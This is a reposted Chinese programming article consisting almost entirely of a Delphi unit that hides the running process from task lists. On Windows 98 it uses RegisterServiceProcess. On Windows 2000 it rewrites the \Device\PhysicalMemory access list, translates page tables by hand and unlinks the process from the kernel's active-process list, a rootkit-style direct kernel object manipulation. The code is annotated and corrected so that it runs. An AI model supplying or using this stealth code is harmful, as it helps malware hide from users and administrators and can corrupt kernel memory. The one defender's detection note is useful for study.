Process hiding in Delphi (via \Device\PhysicalMemory)

xiaoxiao2021-03-14  193

Delphi source for hiding a process (Windows 98 / Windows 2000)

Unit UNITHIDEPROCESS;

Interface

Uses

Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls,

Forms, Dialogs, Registry, Comctrls, Strutils, Stdctrls,

Toolwin, Menus, Imglist, Actnlist, Inifiles, Checklst, FileCtrl, ACLAPI,

Accctrl;

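type
  // Minimal NT native-API type aliases for the calls below. These records are
  // handed to ntdll.dll by pointer, so every alias must have the same size as
  // the 32-bit kernel definition it stands in for.
  NTSTATUS = LongInt;
  USHORT   = Word;       // 16 bits; Byte here would shrink UNICODE_STRING and shift .Buffer
  PWSTR    = PWideChar;
  ULONG    = Cardinal;
  HANDLE   = Pointer;
  PVOID    = Pointer;
  PCWSTR   = PWideChar;
  PULONG   = ^ULONG;
  HMODULE  = THandle;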

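const
  // NTSTATUS values are signed 32-bit. Without the cast $C0000022 is a
  // Cardinal constant, the comparison against a LongInt status promotes to
  // Int64 and never matches, so the access-denied retry path would be dead.
  STATUS_SUCCESS       = LongInt(0);
  STATUS_ACCESS_DENIED = LongInt($C0000022);
  // RegisterServiceProcess flags (Windows 9x only).
  RSP_SIMPLE_SERVICE     = $00000001;
  RSP_UNREGISTER_SERVICE = $00000000;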

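type
  // UNICODE_STRING: counted wide string of the native API. Length and
  // MaximumLength are byte counts in 16-bit fields.
  _UNICODE_STRING = record
    Length: USHORT;
    MaximumLength: USHORT;
    Buffer: PWSTR;
  end;
  UNICODE_STRING  = _UNICODE_STRING;
  PUNICODE_STRING = ^_UNICODE_STRING;

  // OBJECT_ATTRIBUTES: names the object passed to ZwOpenSection. Length has
  // to be set to the record size by the caller (see OpenPhysicalMemory).
  _OBJECT_ATTRIBUTES = record
    Length: ULONG;
    RootDirectory: HANDLE;
    ObjectName: PUNICODE_STRING;
    Attributes: ULONG;
    SecurityDescriptor: PVOID;
    SecurityQualityOfService: PVOID;
  end;
  OBJECT_ATTRIBUTES  = _OBJECT_ATTRIBUTES;
  POBJECT_ATTRIBUTES = ^_OBJECT_ATTRIBUTES;

  // Prototypes of the two ntdll.dll exports resolved at run time in InitNtDll.
  ZWOPENSECTION = function(SectionHandle: PHandle; DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  RTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PCWSTR); stdcall;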

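type
  // Hides the calling process from the task list.
  //   Windows 98:   RegisterServiceProcess marks the process as a service,
  //                 which the Windows 9x Close Program list leaves out.
  //   Windows 2000: opens \Device\PhysicalMemory, walks the x86 page tables
  //                 by hand and unlinks the current EPROCESS from
  //                 ActiveProcessLinks (direct kernel object manipulation).
  // The 2000 path depends on fixed Windows 2000 x86 structure offsets and on
  // user-mode access to \Device\PhysicalMemory with an administrator token;
  // later Windows releases refuse that access from user mode altogether.
  TMyHideProcess = class
  private
    OSVersion: LongInt;                       // 98 or 2000, dispatched in DoHideMe
    FRtlInitUnicodeString: RTLINITUNICODESTRING;
    FZwOpenSection: ZWOPENSECTION;
    g_hNtDll: HMODULE;                        // ntdll.dll module handle, 0 when unloaded
    g_pMapPhysicalMemory: PVOID;              // view of the page-directory page
    g_hMPM: THandle;                          // \Device\PhysicalMemory section handle
    function InitNtDll: BOOL;
    procedure CloseNtDll;
    procedure SetPhysicalMemorySectionCanBeWrite(hSection: THandle);
    function OpenPhysicalMemory: THandle;
    function LinearToPhys(BaseAddress: PULONG; Addr: PVOID): PVOID;
    function GetData(Addr: PVOID): ULONG;
    function SetData(Addr: PVOID; Data: ULONG): BOOL;
    function HideProcess2000: BOOL;
    procedure HideProcess98;
  public
    constructor Create(TheOSVer: LongInt);
    // `override` is required: without it Free never reaches this destructor
    // and ntdll.dll would stay loaded.
    destructor Destroy; override;
    procedure DoHideMe;
  end;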

IMPLEMENTATION

// TheOSVer selects the strategy in DoHideMe (98 or 2000); any other value
// makes DoHideMe a no-op. The handle fields need no explicit reset here:
// TObject.NewInstance zero-fills the instance, so Destroy/CloseNtDll is safe
// even if InitNtDll never ran.
constructor TMyHideProcess.Create(TheOSVer: LongInt);
begin
  inherited Create;
  OSVersion := TheOSVer;
end;

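// Releases ntdll.dll if InitNtDll loaded it, then chains to TObject. The
// original neither called `inherited` nor was declared `override`, so a
// `.Free` on the object would have skipped this body entirely.
destructor TMyHideProcess.Destroy;
begin
  CloseNtDll;
  inherited Destroy;
end;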

// Dispatches on the OS version handed to Create. Unknown versions do
// nothing; the Boolean result of HideProcess2000 is deliberately not
// surfaced to the caller, exactly as before.
procedure TMyHideProcess.DoHideMe;
begin
  if OSVersion = 98 then
    HideProcess98
  else if OSVersion = 2000 then
    HideProcess2000;
end;

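// Loads ntdll.dll and resolves the two native-API entry points used by
// OpenPhysicalMemory. Returns False, with nothing left loaded, if the
// module or either export is missing, so the function pointers are never
// invoked while nil.
// GetProcAddress is case-sensitive: the original looked up
// 'rtLinitUnicodestring' / 'zwopensection', got nil for both, and would
// have faulted on the first call through them.
function TMyHideProcess.InitNtDll: BOOL;
begin
  Result := False;
  g_hNtDll := 0;
  g_pMapPhysicalMemory := nil;
  g_hMPM := 0;
  FRtlInitUnicodeString := nil;
  FZwOpenSection := nil;

  g_hNtDll := LoadLibrary('NTDLL.DLL');
  if g_hNtDll = 0 then
    Exit;

  @FRtlInitUnicodeString := GetProcAddress(g_hNtDll, 'RtlInitUnicodeString');
  @FZwOpenSection := GetProcAddress(g_hNtDll, 'ZwOpenSection');
  if (not Assigned(FRtlInitUnicodeString)) or (not Assigned(FZwOpenSection)) then
  begin
    CloseNtDll;
    Exit;
  end;

  Result := True;
end;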

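// Unloads ntdll.dll and clears the handle plus the resolved pointers, so a
// second call (HideProcess2000 calls it and Destroy calls it again) is a
// no-op rather than a FreeLibrary on a stale handle.
procedure TMyHideProcess.CloseNtDll;
begin
  if g_hNtDll <> 0 then
  begin
    FreeLibrary(g_hNtDll);
    g_hNtDll := 0;
  end;
  FRtlInitUnicodeString := nil;
  FZwOpenSection := nil;
end;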

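// Grants SECTION_MAP_WRITE on hSection to the current user by adding an ACE
// to the object's DACL. hSection must have been opened with READ_CONTROL
// (for GetSecurityInfo) and WRITE_DAC (for SetSecurityInfo); on Windows 2000
// \Device\PhysicalMemory grants those only to Administrators, which is why
// the whole technique needs an administrative token. Failures are silent by
// design: the caller re-opens the section afterwards and checks that status.
// NOTE(review): the parameter kinds of GetSecurityInfo/SetEntriesInAcl differ
// between Delphi versions' AclAPI.pas; this follows the Delphi 7 declarations.
procedure TMyHideProcess.SetPhysicalMemorySectionCanBeWrite(hSection: THandle);
var
  pDacl, pNewDacl: PACL;
  pSD: PSECURITY_DESCRIPTOR;
  ea: EXPLICIT_ACCESS;
begin
  pDacl := nil;
  pNewDacl := nil;
  pSD := nil;
  try
    if GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
         nil, nil, @pDacl, nil, pSD) <> ERROR_SUCCESS then
      Exit;

    ZeroMemory(@ea, SizeOf(ea));
    ea.grfAccessPermissions := SECTION_MAP_WRITE;
    ea.grfAccessMode := GRANT_ACCESS;
    ea.grfInheritance := NO_INHERITANCE;
    ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
    // "CURRENT_USER" is the special trustee name SetEntriesInAcl resolves to
    // the caller's own account.
    ea.Trustee.ptstrName := 'CURRENT_USER';

    if SetEntriesInAcl(1, @ea, pDacl, pNewDacl) <> ERROR_SUCCESS then
      Exit;

    SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
      nil, nil, pNewDacl, nil);
  finally
    // pDacl points into pSD and is released with it; pNewDacl is a separate
    // allocation returned by SetEntriesInAcl.
    if pSD <> nil then
      LocalFree(HLOCAL(pSD));
    if pNewDacl <> nil then
      LocalFree(HLOCAL(pNewDacl));
  end;
end;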

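// Opens the \Device\PhysicalMemory section for read/write and maps the page
// at physical $30000 into g_pMapPhysicalMemory. LinearToPhys indexes that
// view as the page directory, so $30000 is assumed to be where the Windows
// 2000 x86 kernel keeps it -- a per-release constant, confirm per build.
// If the first open is denied, the DACL is widened through
// SetPhysicalMemorySectionCanBeWrite and the open is retried once.
// Returns g_hMPM on success and 0 on failure, in which case nothing is left
// open or mapped. Later Windows releases deny user-mode opens of this object
// outright, so success requires a Windows 2000-era kernel and an
// administrator token.
function TMyHideProcess.OpenPhysicalMemory: THandle;
var
  status: NTSTATUS;
  physMemString: UNICODE_STRING;
  attributes: OBJECT_ATTRIBUTES;
begin
  Result := 0;
  g_hMPM := 0;
  g_pMapPhysicalMemory := nil;

  // NT object-manager path (backslashes), not a Win32 "\\.\" device path.
  FRtlInitUnicodeString(@physMemString, PCWSTR('\Device\PhysicalMemory'));
  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physMemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;

  status := FZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  if status = STATUS_ACCESS_DENIED then
  begin
    // Re-open with just enough rights to edit the DACL, then retry for real.
    status := FZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    if status <> STATUS_SUCCESS then
    begin
      g_hMPM := 0;
      Exit;
    end;
    SetPhysicalMemorySectionCanBeWrite(g_hMPM);
    CloseHandle(g_hMPM);
    g_hMPM := 0;
    status := FZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;

  // The original tested `status = 0` here and so bailed out on success.
  if status <> STATUS_SUCCESS then
  begin
    g_hMPM := 0;
    Exit;
  end;

  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, $30000, $1000);
  if g_pMapPhysicalMemory = nil then
  begin
    CloseHandle(g_hMPM);
    g_hMPM := 0;
    Exit;
  end;

  Result := g_hMPM;
end;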

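// -----------------------------------------------------------------------------
type
  // View of one mapped 4 KiB page as 1024 DWORD entries. Every index used
  // below is already masked to 10 bits (vaddr shr 22, bits 21..12, or
  // (phys and $FFF) shr 2), so the full 0..1023 range is declared instead of
  // the original [0..0], which only worked with range checking disabled.
  TArrayULong  = array[0..1023] of ULONG;
  PTArrayULong = ^TArrayULong;
// -----------------------------------------------------------------------------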

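// Translates a virtual address to a physical one by walking the 32-bit
// non-PAE x86 two-level page tables, with BaseAddress as the mapped page
// directory. Only that layout is handled: 4-byte entries, 10/10/12-bit split,
// PS bit ($80) for 4 MiB pages. A PAE kernel (8-byte entries, three levels)
// would be misread, so this is strictly a Windows 2000 non-PAE routine.
// Returns nil when the directory or table entry is not present (bit 0 clear)
// or the page table cannot be mapped. Callers must treat nil as failure;
// physical address 0 is a real page and must not be read as a result.
function TMyHideProcess.LinearToPhys(BaseAddress: PULONG; Addr: PVOID): PVOID;
var
  vaddr, pgde, pte, paddr: ULONG;
  pageTable: PTArrayULong;
begin
  Result := nil;
  vaddr := ULONG(Addr);

  // Bits 31..22 index the page directory.
  pgde := PTArrayULong(BaseAddress)^[vaddr shr 22];
  if (pgde and 1) = 0 then
    Exit;                                   // directory entry not present

  if (pgde and $80) <> 0 then
  begin
    // 4 MiB page: the PDE carries bits 31..22 of the frame, the low 22 bits
    // of the virtual address are the offset. (The original dropped the `or`
    // and used a 7-digit mask.)
    paddr := (pgde and $FFC00000) or (vaddr and $003FFFFF);
  end
  else
  begin
    // Map the 4 KiB page table the PDE points at and index it with bits 21..12.
    pageTable := PTArrayULong(MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
      pgde and $FFFFF000, $1000));
    if pageTable = nil then
      Exit;
    try
      pte := pageTable^[(vaddr and $003FF000) shr 12];
      if (pte and 1) = 0 then
        Exit;                               // page not present (e.g. paged out)
      paddr := (pte and $FFFFF000) or (vaddr and $00000FFF);
    finally
      // The original leaked this view on the not-present path.
      UnmapViewOfFile(pageTable);
    end;
  end;

  Result := PVOID(paddr);
end;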

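// Reads the 32-bit value at virtual address Addr through the physical-memory
// section. Returns 0 when the address does not translate or the page cannot
// be mapped; 0 is therefore ambiguous, and callers must sanity-check values
// they are about to dereference (HideProcess2000 does).
// The original tested `tmp <> nil` and so returned 0 on every successful
// map and dereferenced nil on every failed one.
function TMyHideProcess.GetData(Addr: PVOID): ULONG;
var
  phys: ULONG;
  page: PTArrayULong;
begin
  Result := 0;
  phys := ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory), Addr));
  if phys = 0 then
    Exit;                                   // translation failed, do not read page 0

  page := PTArrayULong(MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
    phys and $FFFFF000, $1000));
  if page = nil then
    Exit;
  try
    // Index the page as DWORDs using the low 12 bits of the physical address.
    Result := page^[(phys and $FFF) shr 2];
  finally
    UnmapViewOfFile(page);
  end;
end;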

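// Writes the 32-bit value Data at virtual address Addr through the
// physical-memory section. Returns False when the address does not translate
// or the page cannot be mapped for writing; the write then does not happen,
// so callers can stop before half-patching a kernel structure.
// The original tested `tmp <> nil` and so failed on every successful map
// and dereferenced nil on every failed one.
function TMyHideProcess.SetData(Addr: PVOID; Data: ULONG): BOOL;
var
  phys: ULONG;
  page: PTArrayULong;
begin
  Result := False;
  phys := ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory), Addr));
  if phys = 0 then
    Exit;                                   // translation failed, never write page 0

  page := PTArrayULong(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));
  if page = nil then
    Exit;
  try
    page^[(phys and $FFF) shr 2] := Data;
    Result := True;
  finally
    UnmapViewOfFile(page);
  end;
end;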

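// Unlinks the calling process from the kernel's active-process list so that
// enumeration through that list (Task Manager, tlist, ...) no longer reports
// it. All offsets are hard-coded Windows 2000 x86 constants and must be
// confirmed against kernel symbols before use on any build:
//   $FFDFF124   current-thread pointer inside the processor control region
//   thread+$22C owning process of that thread
//   proc+$A0    Flink of the process list entry
//   proc+$A4    Blink of the process list entry
// On any other release the two SetData calls overwrite whatever lives there.
// Returns False without writing anything if ntdll cannot be initialised, the
// section cannot be opened, or a read fails to translate; the original
// returned True even when InitNtDll failed.
// NOTE(review): the unlinked entry keeps pointing at its former neighbours;
// the kernel's own list removal on process exit writes through those stale
// pointers, which is the well-known instability of this technique. For
// defenders: the process is still referenced from other kernel structures,
// so cross-view enumeration (e.g. by thread or handle) can still expose it.
function TMyHideProcess.HideProcess2000: BOOL;
var
  thread, process, fw, bw: ULONG;
begin
  Result := False;
  if not InitNtDll then
    Exit;
  try
    if OpenPhysicalMemory = 0 then
      Exit;
    try
      thread := GetData(PVOID($FFDFF124));
      if thread = 0 then
        Exit;
      process := GetData(PVOID(thread + $22C));
      if process = 0 then
        Exit;
      fw := GetData(PVOID(process + $A0));
      bw := GetData(PVOID(process + $A4));
      if (fw = 0) or (bw = 0) then
        Exit;

      // next.Blink := prev; prev.Flink := next. If the second write fails
      // the list is left half-patched; there is no way to undo the first.
      if not SetData(PVOID(fw + 4), bw) then
        Exit;
      if not SetData(PVOID(bw), fw) then
        Exit;
      Result := True;
    finally
      UnmapViewOfFile(g_pMapPhysicalMemory);
      g_pMapPhysicalMemory := nil;
      CloseHandle(g_hMPM);
      g_hMPM := 0;
    end;
  finally
    CloseNtDll;
  end;
end;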

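// Windows 9x: RegisterServiceProcess(0, RSP_SIMPLE_SERVICE) marks the calling
// process (0 = current) as a service, which keeps it out of the Close
// Program list. The export exists only in the 9x kernel32.dll, so on NT
// GetProcAddress returns nil and must not be called through; the original
// called it unconditionally and its argument list was garbled.
procedure TMyHideProcess.HideProcess98;
type
  PREGISTERSERVICE = function(dwProcessId, dwType: DWORD): DWORD; stdcall;
var
  hKernel: HMODULE;
  registerService: PREGISTERSERVICE;
begin
  hKernel := LoadLibrary('kernel32.dll');
  if hKernel = 0 then
    Exit;
  try
    @registerService := GetProcAddress(hKernel, 'RegisterServiceProcess');
    if Assigned(registerService) then
      registerService(0, RSP_SIMPLE_SERVICE);
  finally
    FreeLibrary(hKernel);
  end;
end;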

End.

Reprints must credit the original source: https://www.9cbs.com/read-129465.html
